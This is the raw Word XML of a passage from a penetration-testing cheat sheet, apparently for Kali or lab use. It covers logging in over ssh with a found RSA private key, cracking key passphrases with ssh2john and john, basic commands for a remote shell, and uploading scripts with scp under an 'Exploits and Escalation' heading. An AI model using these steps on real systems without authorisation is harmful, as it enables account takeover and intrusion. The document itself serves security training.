              <w:t>-4</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Force IPv4</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00961AF1">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-6</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Force IPv6</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00961AF1">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-i</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Identity File (useful for private keys)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A4790" w14:paraId="74C7F48F" w14:textId="77777777" w:rsidTr="000417B4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3A51C27F" w14:textId="38927ECB" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00854B38">
            <w:r>
              <w:t>83.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6D9F5D2C" w14:textId="77777777" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00854B38">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B84C13C" w14:textId="77777777" w:rsidR="002A4790" w:rsidRPr="00F8582A" w:rsidRDefault="002A4790" w:rsidP="005F2BC6">
            <w:r w:rsidRPr="00F8582A">
              <w:t>If we have a private key file (such as an RSA) this can be used to bypass passwords, use:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15C6556D" w14:textId="58AD9654" w:rsidR="002A4790" w:rsidRPr="009A029F" w:rsidRDefault="002A4790" w:rsidP="005F2BC6">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F8582A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F8582A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F8582A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILE_WITH_HASH</w:t>
            </w:r>
            <w:r w:rsidRPr="00F8582A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>@</w:t>
            </w:r>
            <w:r w:rsidRPr="00F8582A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET.IP.ADD.RESS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00F8582A">
              <w:t>Sometimes, this will prompt for a passphrase for the key- this can be cracked using ssh2john (to prepare the file for john) and then using the newly created file in john.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A4790" w14:paraId="533D2F9B" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5599EF24" w14:textId="77304D2C" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00854B38">
            <w:r>
              <w:t>83.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0D780CE6" w14:textId="77777777" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00854B38">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AE082A0" w14:textId="4E78B158" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00E160D7">
            <w:r>
              <w:t>Here are some useful commands once a connection has been established and you have a remote shell.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00C6795B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>ls</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Show directory contents (list the names of files)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7200136E" w14:textId="39175084" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00E160D7">
            <w:r w:rsidRPr="00C6795B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cd </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Change Directory</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07F664F7" w14:textId="5363DCB8" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00E160D7">
            <w:r w:rsidRPr="00C6795B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">mkdir </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Create a new folder (directory)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="128C10E7" w14:textId="0382FE56" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00E160D7">
            <w:r w:rsidRPr="00C6795B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>touch</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Create a new file</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22713819" w14:textId="5C2B4856" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00E160D7">
            <w:r w:rsidRPr="00C6795B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">rm </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Remove a file</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C81EA2D" w14:textId="253422E4" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00E160D7">
            <w:r w:rsidRPr="00C6795B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cat </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Show contents of a file</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F01AB0C" w14:textId="73F55112" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00E160D7">
            <w:r w:rsidRPr="00C6795B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>pwd</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Show current directory (full path to where you are right now)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E0BB804" w14:textId="42E20562" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00E160D7">
            <w:r w:rsidRPr="00C6795B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cp </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Copy file/folder</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="729F1DF5" w14:textId="49259C17" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00E160D7">
            <w:r w:rsidRPr="00C6795B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">mv </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Move file/folder</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D4D3C29" w14:textId="48BF9198" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00E160D7">
            <w:r w:rsidRPr="00C6795B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">grep </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Search for a specific phrase in file/lines</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7709C9FB" w14:textId="20FA98AB" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00E160D7">
            <w:r w:rsidRPr="00C6795B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">find </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Search files and directories</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D96A143" w14:textId="00ADA75F" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00E160D7">
            <w:r w:rsidRPr="00C6795B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>vi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C6795B">
              <w:t>OR</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C6795B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">nano </w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Text editors</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26B56394" w14:textId="33C0A604" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00E160D7">
            <w:r w:rsidRPr="00C6795B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>history</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Show last 50 used commands</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17B9EF3F" w14:textId="580E32D3" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00E160D7">
            <w:r w:rsidRPr="00C6795B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">clear </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Clear the terminal screen</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="531C0C7E" w14:textId="632686CC" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00E160D7">
            <w:r w:rsidRPr="00C6795B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">tar </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Create &amp; Unpack compressed archives</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="761817FC" w14:textId="30771327" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00E160D7">
            <w:r w:rsidRPr="00C6795B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">wget </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Download files from the internet</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="273C66B7" w14:textId="197ECC7A" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00E160D7">
            <w:r w:rsidRPr="00C6795B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">du </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Get file size</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A4790" w14:paraId="7E6F3B3F" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="772CCAF2" w14:textId="0A73A802" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00854B38">
            <w:r>
              <w:t>83.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0C72951C" w14:textId="77777777" w:rsidR="002A4790" w:rsidRDefault="002A4790" w:rsidP="00854B38">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="045403AF" w14:textId="100EE262" w:rsidR="002A4790" w:rsidRDefault="002C4B89" w:rsidP="00E160D7">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C4B89">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF YOU GET A USERNAME AND RSA PRIVATE KEY, THIS COULD BE USED WITH SSH TO LOG IN AS THAT USER.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="260F913C" w14:textId="5573918A" w:rsidR="00616788" w:rsidRDefault="00616788" w:rsidP="00E160D7">
            <w:r w:rsidRPr="00616788">
              <w:t>This</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> method may ask you for a password if the file permission of the RSA_FILENAME has more than read permissions, if this is the case change the permission to 600:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DA34F7F" w14:textId="44D7793A" w:rsidR="00616788" w:rsidRPr="00EA7204" w:rsidRDefault="00616788" w:rsidP="00E160D7">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00616788">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">chmod </w:t>
            </w:r>
            <w:r w:rsidRPr="00616788">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">600 </w:t>
            </w:r>
            <w:r w:rsidRPr="00616788">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>RSA_FILENAME</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00EA7204">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
              <w:t>[If ssh asks for a password]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22CF1BEE" w14:textId="2C580B11" w:rsidR="002C4B89" w:rsidRDefault="002C4B89" w:rsidP="00E160D7">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C4B89">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh </w:t>
            </w:r>
            <w:r w:rsidRPr="002C4B89">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-i </w:t>
            </w:r>
            <w:r w:rsidRPr="002C4B89">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">RSA_FILENAME </w:t>
            </w:r>
            <w:r w:rsidRPr="002C4B89">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>USERNAME</w:t>
            </w:r>
            <w:r w:rsidRPr="002C4B89">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>@</w:t>
            </w:r>
            <w:r w:rsidRPr="002C4B89">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>TARGET_IP_ADDRESS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB6872" w14:paraId="70B66BDD" w14:textId="77777777" w:rsidTr="002A4790">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="077B0CA8" w14:textId="77777777" w:rsidR="00BB6872" w:rsidRDefault="00BB6872" w:rsidP="00854B38"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="16A13923" w14:textId="77777777" w:rsidR="00BB6872" w:rsidRPr="002A4790" w:rsidRDefault="00BB6872" w:rsidP="00854B38">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="CCFFFF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4219BEB8" w14:textId="77777777" w:rsidR="00BB6872" w:rsidRPr="001E0F42" w:rsidRDefault="00BB6872" w:rsidP="00854B38"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A9FE072" w14:textId="77777777" w:rsidR="00546705" w:rsidRDefault="00546705"/>
    <w:p w14:paraId="46CEA4EB" w14:textId="77777777" w:rsidR="006322D3" w:rsidRDefault="006322D3">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2258785A" w14:textId="13C91EBB" w:rsidR="006322D3" w:rsidRDefault="006322D3" w:rsidP="006322D3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r w:rsidR="009A029F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>scp</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6322D3" w14:paraId="7C85D111" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="370DD9EE" w14:textId="0BE9405B" w:rsidR="006322D3" w:rsidRDefault="007B068B" w:rsidP="00C40FD7">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="006322D3">
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="296E5302" w14:textId="77777777" w:rsidR="006322D3" w:rsidRPr="00C3613A" w:rsidRDefault="006322D3" w:rsidP="00C40FD7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>scp</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB6872">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>OpenSSH secure file copy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:br/>
              <w:t>(scp is installed on Kali by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08733B83" w14:textId="77777777" w:rsidR="006322D3" w:rsidRDefault="006322D3" w:rsidP="00C40FD7">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB6872">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF SSH CONNECTION IS GAINED, YOU CAN USE SCP, OTHERWISE SKIP.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47BEC484" w14:textId="77777777" w:rsidR="006322D3" w:rsidRPr="00BB6872" w:rsidRDefault="006322D3" w:rsidP="00C40FD7">
            <w:r>
              <w:t xml:space="preserve">One way to upload a file or script onto a target machine is over ssh using the </w:t>
            </w:r>
            <w:r w:rsidRPr="00446586">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">scp </w:t>
            </w:r>
            <w:r>
              <w:t>command.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006322D3" w14:paraId="7B5FCF08" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="34B28691" w14:textId="2BA5EE43" w:rsidR="006322D3" w:rsidRDefault="007B068B" w:rsidP="00C40FD7">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="006322D3">
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3FE13939" w14:textId="77777777" w:rsidR="006322D3" w:rsidRDefault="006322D3" w:rsidP="00C40FD7">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E5D23A9" w14:textId="65E491E6" w:rsidR="006322D3" w:rsidRDefault="006322D3" w:rsidP="00C40FD7">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>To send the script</w:t>
            </w:r>
            <w:r w:rsidR="00075A15">
              <w:t>/file</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> remotely over ssh, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009B155E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">scp </w:t>
            </w:r>
            <w:r w:rsidRPr="009B155E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILE/TO/COPY.sh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
